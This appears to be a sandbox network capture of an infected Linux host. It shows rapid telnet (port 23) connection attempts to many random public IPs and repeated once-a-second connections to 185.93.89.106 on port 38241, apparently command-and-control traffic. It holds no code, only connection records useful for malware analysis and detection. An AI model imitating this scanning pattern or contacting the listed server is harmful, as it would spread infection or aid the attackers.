Feb 10, 2025 21:08:11.201230049 CET	42604	23	192.168.2.23	99.58.237.214
Feb 10, 2025 21:08:11.201236010 CET	33494	23	192.168.2.23	178.218.49.197
Feb 10, 2025 21:08:11.201236010 CET	55108	23	192.168.2.23	4.226.234.4
Feb 10, 2025 21:08:11.201246023 CET	49174	23	192.168.2.23	96.230.6.227
Feb 10, 2025 21:08:11.201256990 CET	41534	23	192.168.2.23	109.85.245.208
Feb 10, 2025 21:08:11.201260090 CET	36806	23	192.168.2.23	76.224.64.167
Feb 10, 2025 21:08:11.201267958 CET	48044	23	192.168.2.23	200.193.231.216
Feb 10, 2025 21:08:11.201268911 CET	58000	23	192.168.2.23	14.187.67.174
Feb 10, 2025 21:08:11.201268911 CET	46520	23	192.168.2.23	195.25.99.200
Feb 10, 2025 21:08:11.201276064 CET	52820	23	192.168.2.23	62.109.161.137
Feb 10, 2025 21:08:11.201276064 CET	55690	23	192.168.2.23	179.227.37.131
Feb 10, 2025 21:08:11.201277971 CET	40170	23	192.168.2.23	119.91.247.155
Feb 10, 2025 21:08:11.201297045 CET	36288	23	192.168.2.23	85.25.61.237
Feb 10, 2025 21:08:11.201297998 CET	39310	23	192.168.2.23	212.237.38.75
Feb 10, 2025 21:08:11.201297998 CET	35652	23	192.168.2.23	113.91.171.126
Feb 10, 2025 21:08:11.201303959 CET	40376	23	192.168.2.23	94.105.81.74
Feb 10, 2025 21:08:11.201324940 CET	39570	23	192.168.2.23	167.57.47.185
Feb 10, 2025 21:08:11.201323032 CET	43984	23	192.168.2.23	48.130.37.45
Feb 10, 2025 21:08:11.201323032 CET	48864	23	192.168.2.23	198.125.69.222
Feb 10, 2025 21:08:11.201339960 CET	54266	23	192.168.2.23	61.226.72.47
Feb 10, 2025 21:08:11.201342106 CET	55098	23	192.168.2.23	84.148.98.147
Feb 10, 2025 21:08:11.201342106 CET	58038	23	192.168.2.23	115.96.123.252
Feb 10, 2025 21:08:11.201349020 CET	38866	23	192.168.2.23	119.174.32.119
Feb 10, 2025 21:08:11.201354980 CET	46906	23	192.168.2.23	34.111.106.211
Feb 10, 2025 21:08:11.201359034 CET	35406	23	192.168.2.23	2.229.119.203
Feb 10, 2025 21:08:11.201363087 CET	55906	23	192.168.2.23	9.138.94.12
Feb 10, 2025 21:08:11.201376915 CET	53306	23	192.168.2.23	41.126.85.162
Feb 10, 2025 21:08:11.201379061 CET	52490	23	192.168.2.23	21.205.134.202
Feb 10, 2025 21:08:11.201407909 CET	39790	23	192.168.2.23	103.55.183.129
Feb 10, 2025 21:08:11.201423883 CET	49464	23	192.168.2.23	173.161.235.67
Feb 10, 2025 21:08:11.201426029 CET	48174	23	192.168.2.23	120.128.61.54
Feb 10, 2025 21:08:11.201432943 CET	39406	23	192.168.2.23	131.147.132.9
Feb 10, 2025 21:08:11.201432943 CET	34796	23	192.168.2.23	74.69.249.210
Feb 10, 2025 21:08:11.201446056 CET	52408	23	192.168.2.23	200.75.33.18
Feb 10, 2025 21:08:11.207020044 CET	23	41654	78.245.106.184	192.168.2.23
Feb 10, 2025 21:08:11.207104921 CET	41654	23	192.168.2.23	78.245.106.184
Feb 10, 2025 21:08:11.207149029 CET	23	52150	26.198.108.109	192.168.2.23
Feb 10, 2025 21:08:11.207160950 CET	23	45090	182.58.57.172	192.168.2.23
Feb 10, 2025 21:08:11.207211018 CET	52150	23	192.168.2.23	26.198.108.109
Feb 10, 2025 21:08:11.207226992 CET	45090	23	192.168.2.23	182.58.57.172
Feb 10, 2025 21:08:11.207269907 CET	23	41426	184.15.146.122	192.168.2.23
Feb 10, 2025 21:08:11.207281113 CET	23	51518	96.193.16.6	192.168.2.23
Feb 10, 2025 21:08:11.207285881 CET	23	45980	212.225.56.10	192.168.2.23
Feb 10, 2025 21:08:11.207298994 CET	23	50856	33.200.209.105	192.168.2.23
Feb 10, 2025 21:08:11.207308054 CET	23	55872	32.240.96.51	192.168.2.23
Feb 10, 2025 21:08:11.207324028 CET	41426	23	192.168.2.23	184.15.146.122
Feb 10, 2025 21:08:11.207324028 CET	45980	23	192.168.2.23	212.225.56.10
Feb 10, 2025 21:08:11.207326889 CET	51518	23	192.168.2.23	96.193.16.6
Feb 10, 2025 21:08:11.207328081 CET	23	52276	165.218.132.155	192.168.2.23
Feb 10, 2025 21:08:11.207328081 CET	50856	23	192.168.2.23	33.200.209.105
Feb 10, 2025 21:08:11.207340002 CET	23	41352	185.165.2.79	192.168.2.23
Feb 10, 2025 21:08:11.207353115 CET	23	49174	96.230.6.227	192.168.2.23
Feb 10, 2025 21:08:11.207364082 CET	23	35562	116.33.52.90	192.168.2.23
Feb 10, 2025 21:08:11.207367897 CET	55872	23	192.168.2.23	32.240.96.51
Feb 10, 2025 21:08:11.207393885 CET	49174	23	192.168.2.23	96.230.6.227
Feb 10, 2025 21:08:11.207396984 CET	52276	23	192.168.2.23	165.218.132.155
Feb 10, 2025 21:08:11.207422972 CET	41352	23	192.168.2.23	185.165.2.79
Feb 10, 2025 21:08:11.207449913 CET	35562	23	192.168.2.23	116.33.52.90
Feb 10, 2025 21:08:11.207578897 CET	23	42604	99.58.237.214	192.168.2.23
Feb 10, 2025 21:08:11.207588911 CET	23	33494	178.218.49.197	192.168.2.23
Feb 10, 2025 21:08:11.207597971 CET	23	55108	4.226.234.4	192.168.2.23
Feb 10, 2025 21:08:11.207607031 CET	23	41534	109.85.245.208	192.168.2.23
Feb 10, 2025 21:08:11.207617044 CET	23	36806	76.224.64.167	192.168.2.23
Feb 10, 2025 21:08:11.207627058 CET	23	48044	200.193.231.216	192.168.2.23
Feb 10, 2025 21:08:11.207638979 CET	42604	23	192.168.2.23	99.58.237.214
Feb 10, 2025 21:08:11.207642078 CET	33494	23	192.168.2.23	178.218.49.197
Feb 10, 2025 21:08:11.207642078 CET	55108	23	192.168.2.23	4.226.234.4
Feb 10, 2025 21:08:11.207933903 CET	41534	23	192.168.2.23	109.85.245.208
Feb 10, 2025 21:08:11.207937956 CET	36806	23	192.168.2.23	76.224.64.167
Feb 10, 2025 21:08:11.207967997 CET	48044	23	192.168.2.23	200.193.231.216
Feb 10, 2025 21:08:11.208043098 CET	23	52408	200.75.33.18	192.168.2.23
Feb 10, 2025 21:08:11.208053112 CET	23	34796	74.69.249.210	192.168.2.23
Feb 10, 2025 21:08:11.208062887 CET	23	39406	131.147.132.9	192.168.2.23
Feb 10, 2025 21:08:11.208128929 CET	23	48174	120.128.61.54	192.168.2.23
Feb 10, 2025 21:08:11.208138943 CET	23	49464	173.161.235.67	192.168.2.23
Feb 10, 2025 21:08:11.208148003 CET	23	39790	103.55.183.129	192.168.2.23
Feb 10, 2025 21:08:11.208158016 CET	23	52490	21.205.134.202	192.168.2.23
Feb 10, 2025 21:08:11.208167076 CET	23	53306	41.126.85.162	192.168.2.23
Feb 10, 2025 21:08:11.208178043 CET	23	55906	9.138.94.12	192.168.2.23
Feb 10, 2025 21:08:11.208187103 CET	23	35406	2.229.119.203	192.168.2.23
Feb 10, 2025 21:08:11.208195925 CET	23	46906	34.111.106.211	192.168.2.23
Feb 10, 2025 21:08:11.208204985 CET	23	38866	119.174.32.119	192.168.2.23
Feb 10, 2025 21:08:11.208214045 CET	23	58038	115.96.123.252	192.168.2.23
Feb 10, 2025 21:08:11.208223104 CET	23	55098	84.148.98.147	192.168.2.23
Feb 10, 2025 21:08:11.208233118 CET	23	54266	61.226.72.47	192.168.2.23
Feb 10, 2025 21:08:11.208240986 CET	23	48864	198.125.69.222	192.168.2.23
Feb 10, 2025 21:08:11.208250046 CET	23	43984	48.130.37.45	192.168.2.23
Feb 10, 2025 21:08:11.208259106 CET	23	39570	167.57.47.185	192.168.2.23
Feb 10, 2025 21:08:11.208268881 CET	23	35652	113.91.171.126	192.168.2.23
Feb 10, 2025 21:08:11.208278894 CET	23	40376	94.105.81.74	192.168.2.23
Feb 10, 2025 21:08:11.208287001 CET	23	39310	212.237.38.75	192.168.2.23
Feb 10, 2025 21:08:11.208297014 CET	23	36288	85.25.61.237	192.168.2.23
Feb 10, 2025 21:08:11.208304882 CET	23	46520	195.25.99.200	192.168.2.23
Feb 10, 2025 21:08:11.208317995 CET	23	58000	14.187.67.174	192.168.2.23
Feb 10, 2025 21:08:11.208328009 CET	23	55690	179.227.37.131	192.168.2.23
Feb 10, 2025 21:08:11.208338022 CET	23	52820	62.109.161.137	192.168.2.23
Feb 10, 2025 21:08:11.208347082 CET	23	40170	119.91.247.155	192.168.2.23
Feb 10, 2025 21:08:11.208929062 CET	23	40170	119.91.247.155	192.168.2.23
Feb 10, 2025 21:08:11.208981037 CET	23	52820	62.109.161.137	192.168.2.23
Feb 10, 2025 21:08:11.208992004 CET	23	55690	179.227.37.131	192.168.2.23
Feb 10, 2025 21:08:11.208996058 CET	40170	23	192.168.2.23	119.91.247.155
Feb 10, 2025 21:08:11.209026098 CET	52820	23	192.168.2.23	62.109.161.137
Feb 10, 2025 21:08:11.209042072 CET	23	58000	14.187.67.174	192.168.2.23
Feb 10, 2025 21:08:11.209048986 CET	55690	23	192.168.2.23	179.227.37.131
Feb 10, 2025 21:08:11.209116936 CET	58000	23	192.168.2.23	14.187.67.174
Feb 10, 2025 21:08:11.209125042 CET	23	46520	195.25.99.200	192.168.2.23
Feb 10, 2025 21:08:11.209136009 CET	23	36288	85.25.61.237	192.168.2.23
Feb 10, 2025 21:08:11.209145069 CET	23	39310	212.237.38.75	192.168.2.23
Feb 10, 2025 21:08:11.209153891 CET	23	40376	94.105.81.74	192.168.2.23
Feb 10, 2025 21:08:11.209167004 CET	36288	23	192.168.2.23	85.25.61.237
Feb 10, 2025 21:08:11.209192038 CET	40376	23	192.168.2.23	94.105.81.74
Feb 10, 2025 21:08:11.209202051 CET	46520	23	192.168.2.23	195.25.99.200
Feb 10, 2025 21:08:11.209202051 CET	39310	23	192.168.2.23	212.237.38.75
Feb 10, 2025 21:08:11.209269047 CET	23	35652	113.91.171.126	192.168.2.23
Feb 10, 2025 21:08:11.209278107 CET	23	39570	167.57.47.185	192.168.2.23
Feb 10, 2025 21:08:11.209287882 CET	23	43984	48.130.37.45	192.168.2.23
Feb 10, 2025 21:08:11.209296942 CET	23	48864	198.125.69.222	192.168.2.23
Feb 10, 2025 21:08:11.209305048 CET	23	54266	61.226.72.47	192.168.2.23
Feb 10, 2025 21:08:11.209314108 CET	23	55098	84.148.98.147	192.168.2.23
Feb 10, 2025 21:08:11.209321976 CET	35652	23	192.168.2.23	113.91.171.126
Feb 10, 2025 21:08:11.209322929 CET	23	58038	115.96.123.252	192.168.2.23
Feb 10, 2025 21:08:11.209326982 CET	39570	23	192.168.2.23	167.57.47.185
Feb 10, 2025 21:08:11.209331989 CET	23	38866	119.174.32.119	192.168.2.23
Feb 10, 2025 21:08:11.209335089 CET	48864	23	192.168.2.23	198.125.69.222
Feb 10, 2025 21:08:11.209335089 CET	43984	23	192.168.2.23	48.130.37.45
Feb 10, 2025 21:08:11.209348917 CET	23	46906	34.111.106.211	192.168.2.23
Feb 10, 2025 21:08:11.209357977 CET	23	35406	2.229.119.203	192.168.2.23
Feb 10, 2025 21:08:11.209366083 CET	55098	23	192.168.2.23	84.148.98.147
Feb 10, 2025 21:08:11.209366083 CET	58038	23	192.168.2.23	115.96.123.252
Feb 10, 2025 21:08:11.209367037 CET	23	55906	9.138.94.12	192.168.2.23
Feb 10, 2025 21:08:11.209371090 CET	38866	23	192.168.2.23	119.174.32.119
Feb 10, 2025 21:08:11.209376097 CET	54266	23	192.168.2.23	61.226.72.47
Feb 10, 2025 21:08:11.209378004 CET	23	53306	41.126.85.162	192.168.2.23
Feb 10, 2025 21:08:11.209388018 CET	23	52490	21.205.134.202	192.168.2.23
Feb 10, 2025 21:08:11.209391117 CET	46906	23	192.168.2.23	34.111.106.211
Feb 10, 2025 21:08:11.209398031 CET	35406	23	192.168.2.23	2.229.119.203
Feb 10, 2025 21:08:11.209398031 CET	55906	23	192.168.2.23	9.138.94.12
Feb 10, 2025 21:08:11.209398031 CET	23	39790	103.55.183.129	192.168.2.23
Feb 10, 2025 21:08:11.209412098 CET	53306	23	192.168.2.23	41.126.85.162
Feb 10, 2025 21:08:11.209414005 CET	23	49464	173.161.235.67	192.168.2.23
Feb 10, 2025 21:08:11.209431887 CET	23	48174	120.128.61.54	192.168.2.23
Feb 10, 2025 21:08:11.209433079 CET	52490	23	192.168.2.23	21.205.134.202
Feb 10, 2025 21:08:11.209441900 CET	23	39406	131.147.132.9	192.168.2.23
Feb 10, 2025 21:08:11.209445000 CET	39790	23	192.168.2.23	103.55.183.129
Feb 10, 2025 21:08:11.209449053 CET	49464	23	192.168.2.23	173.161.235.67
Feb 10, 2025 21:08:11.209450960 CET	23	34796	74.69.249.210	192.168.2.23
Feb 10, 2025 21:08:11.209460020 CET	23	52408	200.75.33.18	192.168.2.23
Feb 10, 2025 21:08:11.209466934 CET	48174	23	192.168.2.23	120.128.61.54
Feb 10, 2025 21:08:11.209484100 CET	39406	23	192.168.2.23	131.147.132.9
Feb 10, 2025 21:08:11.209502935 CET	34796	23	192.168.2.23	74.69.249.210
Feb 10, 2025 21:08:11.209502935 CET	52408	23	192.168.2.23	200.75.33.18
Feb 10, 2025 21:08:11.355041981 CET	38241	39752	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:11.355114937 CET	39752	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:11.355354071 CET	39752	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:11.668859005 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 21:08:12.501461983 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:12.506278992 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:12.506355047 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:12.507601023 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:12.512393951 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:12.512439966 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:12.517234087 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:13.433948040 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:13.434051037 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:13.434094906 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:13.434403896 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:13.434489965 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:13.434511900 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:13.434524059 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:14.492772102 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:14.498186111 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:14.498234987 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:14.500710964 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:14.506123066 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:14.506182909 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:14.510960102 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:15.130331993 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:15.130425930 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:15.130475998 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:16.139900923 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:16.144740105 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:16.144828081 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:16.147291899 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:16.152137995 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:16.152204037 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:16.156985044 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:16.748744011 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:16.748843908 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:16.748919010 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:17.044166088 CET	42836	443	192.168.2.23	91.189.91.43
Feb 10, 2025 21:08:17.762012959 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:17.766872883 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:17.766961098 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:17.767808914 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:17.772552013 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:17.772608042 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:17.777426958 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:18.370364904 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:18.370474100 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:18.370543003 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:18.583926916 CET	42516	80	192.168.2.23	109.202.202.202
Feb 10, 2025 21:08:19.380940914 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:19.385730028 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:19.385797024 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:19.386626005 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:19.391361952 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:19.391426086 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:19.396225929 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:19.991317034 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:19.991420031 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:19.991455078 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:20.999712944 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:21.004576921 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:21.004637003 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:21.005306959 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:21.010087967 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:21.010132074 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:21.014883041 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:21.625653982 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:21.625747919 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:21.625780106 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:22.634156942 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:22.638916969 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:22.638988018 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:22.639870882 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:22.644587040 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:22.644627094 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:22.649401903 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:23.269992113 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:23.270091057 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:23.270162106 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:24.278691053 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:24.283524036 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:24.283605099 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:24.284240007 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:24.289052963 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:24.289104939 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:24.293927908 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:25.059914112 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:25.060014963 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:25.060096979 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:26.072685957 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:26.077543020 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:26.077619076 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:26.078360081 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:26.083129883 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:26.083208084 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:26.088020086 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:26.713167906 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:26.713268995 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:26.713330030 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:27.723592997 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:27.729326963 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:27.729393959 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:27.730221033 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:27.735027075 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:27.735096931 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:27.739922047 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:28.351979017 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:28.352133036 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:28.352221012 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:29.462810993 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:29.467653990 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:29.467766047 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:29.468523979 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:29.473285913 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:29.473361969 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:29.478159904 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:31.038685083 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:31.038779020 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:31.038853884 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:31.038885117 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:31.038897038 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:31.038945913 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:31.038945913 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:31.039010048 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:31.039071083 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:31.039277077 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:31.039318085 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:32.048103094 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:32.054378986 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:32.054461956 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:32.054956913 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:32.059679985 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:32.059735060 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:32.064502001 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:32.668508053 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:32.668597937 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:32.668633938 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:33.169946909 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 21:08:33.676623106 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:33.681405067 CET	38241	39822	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:33.681515932 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:33.682241917 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:33.686985970 CET	38241	39822	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:33.687047958 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:33.691756964 CET	38241	39822	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:34.345139980 CET	38241	39822	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:34.345252037 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:34.345299006 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:35.353775978 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:35.359070063 CET	38241	39824	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:35.359123945 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:35.359739065 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:35.364459991 CET	38241	39824	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:35.364496946 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:35.369260073 CET	38241	39824	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:35.964771986 CET	38241	39824	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:35.964854956 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:35.964910030 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:36.972985983 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:36.977808952 CET	38241	39826	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:36.977878094 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:36.978432894 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:36.983191967 CET	38241	39826	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:36.983230114 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:36.987962008 CET	38241	39826	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:37.587028980 CET	38241	39826	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:37.587090969 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:37.587131023 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:38.595156908 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:38.599926949 CET	38241	39828	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:38.599982977 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:38.600672007 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:38.605387926 CET	38241	39828	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:38.605433941 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:38.610239029 CET	38241	39828	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:39.222249031 CET	38241	39828	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:39.222323895 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:39.222393036 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:40.230915070 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:40.235749006 CET	38241	39830	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:40.235795021 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:40.236463070 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 21:08:40.241199017 CET	38241	39830	185.93.89.106	192.168.2.23
Feb 10, 2025 21:08:40.241240978 CET	39830	38241	192.168.2.23	185.93.89.106
